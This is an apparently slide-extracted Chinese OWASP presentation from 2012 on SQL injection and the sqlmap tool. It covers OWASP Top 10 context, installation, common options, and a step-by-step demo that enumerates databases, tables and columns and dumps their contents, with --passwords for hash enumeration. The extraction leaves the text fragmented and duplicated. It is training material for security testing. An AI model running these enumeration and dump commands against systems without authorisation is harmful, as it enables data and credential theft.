sqlmap的分析与演示 - owasp · 2012-12-17 · sqlmap安装及界面 back track 5下...
TRANSCRIPT
sqlmap的分析与演示
Steven YuQQ:747712603 Tel:15018494007
2012‐12‐15
目录
1、SQL注入新闻Q 注 新闻
2、SQL注入背景
3、sqlmap特性介绍
4、sqlmap常用语句
5、sqlmap演示
SQL注入新闻
SQL注入新闻
2010 OWASP Top 10
注入1
跨站脚本(XSS)2
失效的身份认证和会话管理3
不安全的直接对象引用42010 不安全的直接对象引用4
跨站请求伪造(CSRF)5
安全配置错误6
2010OWASP Top 10 安全配置错误6
不安全的加密存储7
没有限制URL访问8
Top 10
没有限制URL访问8
传输层保护不足9
未验证的重定向和转发10 未验证的重定向和转发10
数据来源:http://www.owasp.org.cn/owasp‐project/download/2010_OWASP_Top_10
SQL注入背景
Imperva公司ADC每月网络攻击分析报告(2012年10月)
数据来源:http://www.imperva.com/docs/HII_Monitoring_Hacker_Forums_2012.pdf
SQL注入背景
与上 年的攻击分析进行对比• 与上一年的攻击分析进行对比
数据来源:http://www.imperva.com/docs/HII_Monitoring_Hacker_Forums_2012.pdf
sqlmap特性介绍
1 无需破解 还可以自
开源免费其他
支持多种注入方式支持代理,优化算法支持口令哈希
1. 无需破解,还可以自行修改源代码
使用简单
独立
4. 有命令和图形界面
sqlmap
命令&图形界面
2. 使用Python开发独立于操作系统
数据库全
3.支持MS Access, MySQL, Oracle等10种数据库
l 的优势数据库全
sqlmap的优势
sqlmap安装及界面
Back track 5下 BT5下内置sqlmap(若没有可输入下 BT5下内置sqlmap(若没有可输入apt‐get install sqlmap来安装),如何打开sqlmap:1、打开BackTrack>Vulnerablity
sqlmap GUI
yAssessment>Database Assessment>sqlmap2、终端输入 cd / /d b / l
Windows XP下 Windows下安装sqlmap:
/pentest/database/sqlmap
Windows下安装sqlmap:1、下载并安装用于Windows系统的Python找到安装python的目录,新建一个sqlmap文件夹文件夹2、下载sqlmap并解压到刚刚新建的sqlmap文件夹3、在桌面新建一快捷方式命名为sqlmap,右键属性 在目标栏输入
sqlmap官网:http://sqlmap.org/
右键属性,在目标栏输入:%windir%\system32\cmd.exe4、运行快捷方式就可以了
sqlmap命令
• 常用命令:‐h,‐‐help 帮助
u url 目标url‐D DB 进行枚举的数据库名
T TBL 进行枚举的数据库表‐u url 目标url‐v VERBOSE 详细程度:0‐6‐a,‐all 检索所有
‐T TBL 进行枚举的数据库表
‐C COL 进行枚举的数据库字段
,‐‐current‐user 当前数据库管理
系统用户
db 当前数据库连接方式:
‐‐current‐db 当前数据库
‐‐passwords 枚举用户的密码哈希
‐‐data=DATA 用POST方式发送的数据字符串
‐‐cookie=COOKIE HTTP Cookie头‐‐tables 枚举数据库表
‐‐columns 枚举数据库字段名
转存数据库中表的
cookie COOKIE HTTP Cookie头‐‐random‐agent 使用随机选定的
HTTP User‐Agent头使用代‐‐dump 转存数据库中表的
内容‐‐proxy=PROXY 使用代理
sqlmap演示
./sqlmap.py ‐u url数据库类型
数据库名 ./sqlmap.py ‐u url ‐‐current‐db五
列表名./sqlmap.py ‐u url ‐‐tables ‐D "db name"
五步走
db_name
列字段./sqlmap.py ‐u url ‐‐columns ‐D
列字段"db_name" ‐T "table_name"
./sqlmap.py ‐u url ‐‐dump ‐D 获取内容 "db_name“‐T "table_name“‐C
"column_name"
sqlmap演示
①获取系统类型 服务器类型 数据库类型①获取系统类型、服务器类型、数据库类型
sqlmap演示
②列出所存在的数据库 db②列出所存在的数据库 ‐‐dbs
sqlmap演示
③列出当前数据库 db③列出当前数据库 ‐‐current‐db
sqlmap演示
④列出表名④列出表名 ‐‐tables
sqlmap演示
⑤列出字段 l⑤列出字段 ‐‐columns
sqlmap演示
⑥获取数据库内容 d⑥获取数据库内容 ‐‐dump
sqlmap演示
下载数据库成功Done!下载数据库成功。
让我们多交流多分享
一起成长起成长
一起快乐起快乐
谢谢!谢谢